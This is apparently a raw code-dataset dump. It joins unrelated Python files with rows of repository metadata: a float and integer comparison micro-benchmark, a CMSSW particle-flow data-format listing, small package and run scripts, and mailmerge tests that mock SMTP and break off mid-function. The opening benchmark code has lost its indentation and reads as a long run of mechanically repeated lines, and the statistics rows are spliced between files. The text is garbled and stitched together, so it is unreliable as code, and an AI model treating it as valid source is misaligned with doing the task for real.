2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
return pyperf.perf_counter() - t0
class CompareFloatsIntegers(Test):
version = 2.0
operations = 30 * 5
inner_loops = 30
def test(self, loops):
range_it = xrange(loops)
t0 = pyperf.perf_counter()
for _ in range_it:
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
return pyperf.perf_counter() - t0
class CompareLongs(Test):
    """Micro-benchmark: comparison operators between two large integers.

    The comparison statements below are deliberately unrolled (30 groups
    of the same 5 operators) so that the loop overhead stays small
    relative to the operations being measured.
    """

    version = 2.0        # benchmark revision tag
    # 30 unrolled groups x 5 comparison operators per loop iteration.
    # NOTE(review): presumably consumed by the Test base class / pyperf
    # runner to normalise the reported timings -- confirm.
    operations = 30 * 5
    inner_loops = 30

    def test(self, loops):
        """Time `loops` iterations of the unrolled comparison block.

        Returns the elapsed time measured with pyperf.perf_counter().
        """
        # NOTE(review): long is not a Python 3 builtin; assumed to be a
        # Python 2/3 compatibility alias defined elsewhere in this file.
        a = long(1234567890)
        b = long(3456789012345)
        range_it = xrange(loops)
        t0 = pyperf.perf_counter()
        for _ in range_it:
            # groups 1-5 of: <  >  ==  >  <
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            # groups 6-10
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            # groups 11-15
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            # groups 16-20
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            # groups 21-25
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            # groups 26-30
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
            a < b
            a > b
            a == b
            a > b
            a < b
        return pyperf.perf_counter() - t0
| 16.824273 | 41 | 0.190186 | 1,806 | 13,308 | 1.388151 | 0.02381 | 0.23933 | 0.179497 | 0.299162 | 0.928201 | 0.918229 | 0.882329 | 0.882329 | 0.882329 | 0.882329 | 0 | 0.409771 | 0.713931 | 13,308 | 790 | 42 | 16.84557 | 0.248752 | 0 | 0 | 0.981366 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006211 | false | 0 | 0.006211 | 0 | 0.043478 | 0 | 0 | 0 | 1 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
f962ea4bcbb09d48fcde935d09644fdd71d25451 | 12,285 | py | Python | Documentation/DataFormats/python/RecoParticleFlow_dataformats.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | Documentation/DataFormats/python/RecoParticleFlow_dataformats.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | Documentation/DataFormats/python/RecoParticleFlow_dataformats.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | '''
Created on Jun 26, 2013
@author: Mantas Stankevicius
@contact: mantas.stankevicius@cern.ch
http://cmsdoxy.web.cern.ch/cmsdoxy/dataformats/
@responsible:
'''
json = {
"full": {
"title": "RecoParticleFlow collections (in RECO and AOD)",
"data": [
{
"instance": "pfPhotonTranslator:pfphot",
"container": "reco::CaloClusterCollection",
"desc": "Basic clusters of PF photon super-clusters"
},
{
"instance": "particleFlowPtrs",
"container": "*",
"desc": "No documentation"
},
{
"instance": "pfPhotonTranslator:pfphot",
"container": "reco::PreshowerClusterCollection",
"desc": "Preshower clusters of PF photon super-clusters"
},
{
"instance": "pfElectronTranslator:pf",
"container": "reco::PreshowerClusterCollection",
"desc": "Preshower clusters of PF electron super-clusters"
},
{
"instance": "pfPhotonTranslator:pfphot",
"container": "reco::PhotonCollection",
"desc": "photons imported in PF translated into the RECO format"
},
{
"instance": "particleFlow:electrons",
"container": "reco::PFCandidateCollection",
"desc": "Particle Flow Electron Candidates without any selection (refers to reco::PFBlock`s)"
},
{
"instance": "pfElectronTranslator:pf",
"container": "reco::SuperClusterCollection",
"desc": "Particle Flow Super-clusters of PF-electrons"
},
{
"instance": "pfElectronTranslator:pf",
"container": "reco::CaloClusterCollection",
"desc": "Basic clusters of PF electron super-clusters"
},
{
"instance": "particleFlowClusterHCAL",
"container": "recoPFClusters",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterECAL",
"container": "recoPFClusters",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHFEM",
"container": "recoPFClusters",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHO",
"container": "recoPFClusters",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterPS",
"container": "recoPFClusters",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHFHAD",
"container": "recoPFClusters",
"desc": "No documentation"
},
{
"instance": "particleFlow",
"container": "recoPFCandidates",
"desc": "Particle Flow Candidates (refers to reco::PFBlock`s)"
},
{
"instance": "particleFlowBlock",
"container": "recoPFBlocks",
"desc": "No documentation"
},
{
"instance": "particleFlowDisplacedVertex",
"container": "recoPFDisplacedVertexs",
"desc": "No documentation"
},
{
"instance": "particleFlowTmp",
"container": "recoPFCandidates",
"desc": "No documentation"
},
{
"instance": "particleFlowTmpPtrs",
"container": "*",
"desc": "No documentation"
},
{
"instance": "pfPhotonTranslator:pfphot",
"container": "reco::SuperClusterCollection",
"desc": "Particle Flow Super-clusters of photons imported in PF"
},
{
"instance": "particleFlow",
"container": "*",
"desc": "No documentation"
},
{
"instance": "trackerDrivenElectronSeeds",
"container": "*",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHCAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterECAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHFEM",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHO",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterPS",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHFHAD",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitHO",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitECAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitPS",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitHCAL",
"container": "recoPFRecHits",
"desc": "No documentation"
}
]
},
"aod": {
"title": "RecoParticleFlow collections (in AOD only)",
"data": [
{
"instance": "particleFlowTmpPtrs",
"container": "*",
"desc": "No documentation"
},
{
"instance": "pfPhotonTranslator:pfphot",
"container": "reco::PhotonCollection",
"desc": "photons imported in PF translated into the RECO format"
},
{
"instance": "pfPhotonTranslator",
"container": "recoPhotonCores",
"desc": "No documentation"
},
{
"instance": "pfPhotonTranslator",
"container": "recoConversions",
"desc": "No documentation"
},
{
"instance": "particleFlowPtrs",
"container": "*",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHCAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterECAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHFEM",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHO",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterPS",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHFHAD",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitHCAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitECAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitPS",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitHO",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowTmp",
"container": "recoPFCandidates",
"desc": "No documentation"
},
{
"instance": "particleFlow",
"container": "recoPFCandidates",
"desc": "No documentation"
},
{
"instance": "particleFlow",
"container": "*",
"desc": "No documentation"
},
{
"instance": "particleFlow",
"container": "*",
"desc": "No documentation"
},
{
"instance": "pfElectronTranslator",
"container": "reco::CaloClusterCollection",
"desc": "Basic clusters of PF electron super-clusters"
},
{
"instance": "pfElectronTranslator",
"container": "reco::SuperClusterCollection",
"desc": "Particle Flow Super-clusters of PF-electrons"
},
{
"instance": "pfPhotonTranslator:pfphot",
"container": "reco::CaloClusterCollection",
"desc": "Basic clusters of PF photon super-clusters"
},
{
"instance": "pfElectronTranslator",
"container": "reco::PreshowerClusterCollection",
"desc": "Preshower clusters of PF electron super-clusters"
},
{
"instance": "pfPhotonTranslator:pfphot",
"container": "reco::SuperClusterCollection",
"desc": "Particle Flow Super-clusters of photons imported in PF"
},
{
"instance": "pfPhotonTranslator:pfphot",
"container": "reco::PreshowerClusterCollection",
"desc": "Preshower clusters of PF photon super-clusters"
}
]
},
"reco": {
"title": "RecoParticleFlow collections (in RECO only)",
"data": [
{
"instance": "particleFlowPtrs",
"container": "*",
"desc": "No documentation"
},
{
"instance": "particleFlowTmpPtrs",
"container": "*",
"desc": "No documentation"
},
{
"instance": "pfPhotonTranslator",
"container": "*",
"desc": "No documentation"
},
{
"instance": "particleFlow",
"container": "*",
"desc": "No documentation"
},
{
"instance": "particleFlow",
"container": "*",
"desc": "No documentation"
},
{
"instance": "trackerDrivenElectronSeeds",
"container": "reco::PreIdCollection",
"desc": "Information on the tracker-driven electron seed"
},
{
"instance": "particleFlowClusterHCAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterECAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHFEM",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHO",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterPS",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHFHAD",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitHCAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitECAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitPS",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitHO",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHCAL",
"container": "recoPFClusters",
"desc": "HCAL clusters"
},
{
"instance": "particleFlowClusterECAL",
"container": "recoPFClusters",
"desc": "ECAL clusters"
},
{
"instance": "particleFlowClusterPS",
"container": "recoPFClusters",
"desc": "Preshower clusters"
},
{
"instance": "particleFlowClusterHO",
"container": "recoPFClusters",
"desc": "No documentation"
},
{
"instance": "particleFlow",
"container": "recoPFCandidates",
"desc": "Particle Flow Candidates (refers to reco::PFBlock`s)"
},
{
"instance": "particleFlowBlock",
"container": "recoPFBlocks",
"desc": "Particle Flow Blocks (refers to reco::Track`s and reco::PFCluster`s)"
},
{
"instance": "particleFlowTmp",
"container": "recoPFCandidates",
"desc": "No documentation"
},
{
"instance": "particleFlowTmp",
"container": "recoPFCandidates",
"desc": "No documentation"
},
{
"instance": "pfElectronTranslator",
"container": "reco::GsfElectronCollection",
"desc": "PF electron reconstructed translated in the GsfElectron format"
},
{
"instance": "particleFlowDisplacedVertex",
"container": "recoPFDisplacedVertexs",
"desc": "No documentation"
}
]
}
}
| 27.731377 | 100 | 0.545462 | 765 | 12,285 | 8.759477 | 0.133333 | 0.053723 | 0.170124 | 0.233696 | 0.90494 | 0.863602 | 0.801373 | 0.760036 | 0.724071 | 0.703626 | 0 | 0.000703 | 0.304925 | 12,285 | 442 | 101 | 27.794118 | 0.78405 | 0.012617 | 0 | 0.553241 | 0 | 0 | 0.5897 | 0.143176 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009259 | 0 | 0.009259 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f96dad77337ae131f79ec1e8d7327a12794d9381 | 177 | py | Python | dxtbx/libtbx_refresh.py | jbeilstenedmands/cctbx_project | c228fb15ab10377f664c39553d866281358195aa | [
"BSD-3-Clause-LBNL"
] | null | null | null | dxtbx/libtbx_refresh.py | jbeilstenedmands/cctbx_project | c228fb15ab10377f664c39553d866281358195aa | [
"BSD-3-Clause-LBNL"
] | null | null | null | dxtbx/libtbx_refresh.py | jbeilstenedmands/cctbx_project | c228fb15ab10377f664c39553d866281358195aa | [
"BSD-3-Clause-LBNL"
] | null | null | null | from __future__ import absolute_import, division, print_function
import libtbx.pkg_utils
libtbx.pkg_utils.require('mock', '>=2.0')
libtbx.pkg_utils.require('pytest', '>=3.1')
| 25.285714 | 64 | 0.768362 | 26 | 177 | 4.884615 | 0.653846 | 0.212598 | 0.330709 | 0.330709 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02454 | 0.079096 | 177 | 6 | 65 | 29.5 | 0.754601 | 0 | 0 | 0 | 0 | 0 | 0.112994 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.25 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
f9ab940ee887953fd5ae04c2fd9f7c5e32894975 | 86 | py | Python | magda/module/__init__.py | p-mielniczuk/magda | 6359fa5721b4e27bd98f2c6af0e858b476645618 | [
"Apache-2.0"
] | 8 | 2021-02-25T14:00:25.000Z | 2022-03-10T00:32:43.000Z | magda/module/__init__.py | p-mielniczuk/magda | 6359fa5721b4e27bd98f2c6af0e858b476645618 | [
"Apache-2.0"
] | 22 | 2021-03-24T11:56:47.000Z | 2021-11-02T15:09:50.000Z | magda/module/__init__.py | p-mielniczuk/magda | 6359fa5721b4e27bd98f2c6af0e858b476645618 | [
"Apache-2.0"
] | 6 | 2021-04-06T07:26:47.000Z | 2021-12-07T18:55:52.000Z | from magda.module.module import Module
from magda.module.factory import ModuleFactory
| 28.666667 | 46 | 0.860465 | 12 | 86 | 6.166667 | 0.5 | 0.243243 | 0.405405 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 86 | 2 | 47 | 43 | 0.948718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ddf44e2b2d35f42e107a757ffb9e74cc6eaa38ad | 86 | py | Python | tests/test_api.py | sanchos2/nautilus | 587ba8518a5baf894ed5d8034ffef582ea6023f1 | [
"MIT"
] | null | null | null | tests/test_api.py | sanchos2/nautilus | 587ba8518a5baf894ed5d8034ffef582ea6023f1 | [
"MIT"
] | 5 | 2020-05-02T04:18:54.000Z | 2020-06-17T16:27:15.000Z | tests/test_api.py | sanchos2/nautilus | 587ba8518a5baf894ed5d8034ffef582ea6023f1 | [
"MIT"
] | null | null | null | import pytest
from webapp.api.views import *
def test_grscaner_process():
    # TODO(review): placeholder -- no assertions yet. Implement real
    # coverage for the grscaner processing view imported from
    # webapp.api.views.
    pass
| 10.75 | 30 | 0.744186 | 12 | 86 | 5.166667 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186047 | 86 | 7 | 31 | 12.285714 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
fb3bdcc0b8dd0fd38f6e8de058e1df695506edde | 126 | py | Python | run.py | SaberSz/WeByte | 3f88d572990b8342d2f28065fbb1d092449bf0ea | [
"MIT"
] | null | null | null | run.py | SaberSz/WeByte | 3f88d572990b8342d2f28065fbb1d092449bf0ea | [
"MIT"
] | null | null | null | run.py | SaberSz/WeByte | 3f88d572990b8342d2f28065fbb1d092449bf0ea | [
"MIT"
] | null | null | null | from CodeArena import app
if __name__ == '__main__':
    # Run the Flask development server when executed directly.
    # debug=True enables the reloader and interactive debugger --
    # not suitable for production deployments.
    app.run(debug=True)
| 18 | 31 | 0.65873 | 17 | 126 | 4.411765 | 0.588235 | 0.346667 | 0.506667 | 0.586667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.230159 | 126 | 6 | 32 | 21 | 0.773196 | 0.277778 | 0 | 0 | 0 | 0 | 0.090909 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
34959701fde34380130e97b7092da36a8e262341 | 12,745 | py | Python | tests/test_sendmail_client.py | captn3m0/mailmerge | 6c40c252154cd3360a7dc054619ae8919150974c | [
"MIT"
] | 1 | 2021-08-14T19:17:44.000Z | 2021-08-14T19:17:44.000Z | tests/test_sendmail_client.py | captn3m0/mailmerge | 6c40c252154cd3360a7dc054619ae8919150974c | [
"MIT"
] | 1 | 2021-01-05T21:04:42.000Z | 2021-01-05T21:04:42.000Z | tests/test_sendmail_client.py | captn3m0/mailmerge | 6c40c252154cd3360a7dc054619ae8919150974c | [
"MIT"
] | null | null | null | """
Tests for SendmailClient.
Andrew DeOrio <awdeorio@umich.edu>
"""
import textwrap
import socket
import smtplib
import pytest
import future.backports.email as email
import future.backports.email.parser # pylint: disable=unused-import
from mailmerge import SendmailClient, MailmergeError
try:
from unittest import mock # Python 3
except ImportError:
import mock # Python 2
# We're going to use mock_SMTP because it mimics the real SMTP library
# pylint: disable=invalid-name
@mock.patch('smtplib.SMTP')
def test_smtp(mock_SMTP, tmp_path):
    """Verify SMTP library calls."""
    # Write a minimal open-relay server configuration.
    config = tmp_path / "server.conf"
    config.write_text(textwrap.dedent(u"""\
        [smtp_server]
        host = open-smtp.example.com
        port = 25
    """))
    client = SendmailClient(config, dry_run=False)

    # Parse a trivial message and push it through the client.
    msg = email.message_from_string(u"""
TO: to@test.com
SUBJECT: Testing mailmerge
FROM: from@test.com

Hello world
""")
    client.sendmail(
        sender="from@test.com",
        recipients=["to@test.com"],
        message=msg,
    )

    # The mocked SMTP connection records every call made on it; exactly
    # one message must have gone out.
    connection = mock_SMTP.return_value.__enter__.return_value
    assert connection.sendmail.call_count == 1
@mock.patch('smtplib.SMTP')
@mock.patch('getpass.getpass')
def test_dry_run(mock_getpass, mock_SMTP, tmp_path):
    """Verify no sendmail() calls when dry_run=True."""
    # mock.patch decorators apply bottom-up, so mock_getpass comes first.
    # Open server config ("security = Never" means no password prompt).
    config_path = tmp_path/"server.conf"
    config_path.write_text(textwrap.dedent(u"""\
        [smtp_server]
        host = open-smtp.example.com
        port = 25
        security = Never
    """))
    sendmail_client = SendmailClient(
        config_path,
        dry_run=True,
    )
    message = email.message_from_string(u"""
TO: test@test.com
SUBJECT: Testing mailmerge
FROM: test@test.com

Hello world
""")

    # In dry-run mode this call should never touch the network.
    sendmail_client.sendmail(
        sender="from@test.com",
        recipients=["to@test.com"],
        message=message,
    )

    # Verify SMTP wasn't called and password wasn't used
    assert mock_getpass.call_count == 0
    smtp = mock_SMTP.return_value.__enter__.return_value
    assert smtp.sendmail.call_count == 0
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('getpass.getpass')
def test_no_dry_run(mock_getpass, mock_SMTP_SSL, tmp_path):
    """Verify --no-dry-run calls SMTP sendmail()."""
    # mock.patch decorators apply bottom-up, so mock_getpass comes first.
    # SSL/TLS config with a username, so a password will be prompted.
    config_path = tmp_path/"server.conf"
    config_path.write_text(textwrap.dedent(u"""\
        [smtp_server]
        host = open-smtp.example.com
        port = 465
        security = SSL/TLS
        username = admin
    """))
    sendmail_client = SendmailClient(config_path, dry_run=False)
    message = email.message_from_string(u"""
TO: test@test.com
SUBJECT: Testing mailmerge
FROM: test@test.com

Hello world
""")

    # Mock the password entry
    mock_getpass.return_value = "password"

    # Send a message
    sendmail_client.sendmail(
        sender="from@test.com",
        recipients=["to@test.com"],
        message=message,
    )

    # Verify function calls for password and sendmail()
    assert mock_getpass.call_count == 1
    smtp = mock_SMTP_SSL.return_value.__enter__.return_value
    assert smtp.sendmail.call_count == 1
def test_bad_config_key(tmp_path):
    """Verify config file with bad key throws an exception."""
    # An unknown option name in the [smtp_server] section must be
    # rejected at client construction time.
    config = tmp_path / "server.conf"
    content = textwrap.dedent(u"""\
        [smtp_server]
        badkey = open-smtp.example.com
    """)
    config.write_text(content)
    with pytest.raises(MailmergeError):
        SendmailClient(config, dry_run=True)
def test_security_error(tmp_path):
    """Verify config file with bad security type throws an exception."""
    # "bad_value" is not a supported security mode, so constructing the
    # client must fail before any connection is attempted.
    config = tmp_path / "server.conf"
    content = textwrap.dedent(u"""\
        [smtp_server]
        host = smtp.mail.umich.edu
        port = 465
        security = bad_value
        username = YOUR_USERNAME_HERE
    """)
    config.write_text(content)
    with pytest.raises(MailmergeError):
        SendmailClient(config, dry_run=False)
@mock.patch('smtplib.SMTP')
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('getpass.getpass')
def test_security_open(mock_getpass, mock_SMTP_SSL, mock_SMTP, tmp_path):
    """Verify open (Never) security configuration."""
    # mock.patch decorators apply bottom-up; arguments are in reverse
    # decorator order.
    # Config for no security SMTP server
    config_path = tmp_path/"server.conf"
    config_path.write_text(textwrap.dedent(u"""\
        [smtp_server]
        host = open-smtp.example.com
        port = 25
    """))

    # Simple template
    sendmail_client = SendmailClient(config_path, dry_run=False)
